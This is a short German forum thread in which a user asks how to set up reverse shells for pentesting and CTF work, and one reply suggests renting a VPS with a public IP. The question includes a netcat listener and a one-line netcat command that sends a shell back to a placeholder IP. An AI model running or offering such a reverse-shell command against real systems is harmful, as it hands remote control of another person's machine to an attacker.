Wie erstellt ihr eure Reverse Shells?
Für Pentesting und CTF Challenges braucht man manchmal eine Reverse Shell, um RCE auf dem Zielsystem zu erlangen. Am besten geht das mit einer öffentlichen IPv4 Adresse, dann ist ein Befehl wie dieser ausreichend:
nc -lvnp 9001
Und auf dem Zielsystem kann man sich dann z.B. mit diesem Befehl verbinden:
nc 1.2.3.4 9001 -e sh
Oder man verwendet andere Methoden, je nach Möglichkeit.
Allerdings sind öffentliche IP Adressen inzwischen leider sehr selten geworden, und mit NAT funktionieren Reverse Shells nicht mehr.
Wie geht ihr vor, wenn ihr mal eine Reverse Shell braucht?
1 Antwort
![](https://images.gutefrage.net/media/default/user/8_nmmslarge.png?v=1551279448000)
Buch dir halt irgendwo einen günstigen vserver mit einer öffentlichen ip und lass die Reverse Shell Verbindung darüber laufen.
Woher ich das weiß:Berufserfahrung – Seit langer Zeit als Systemadministrator tätig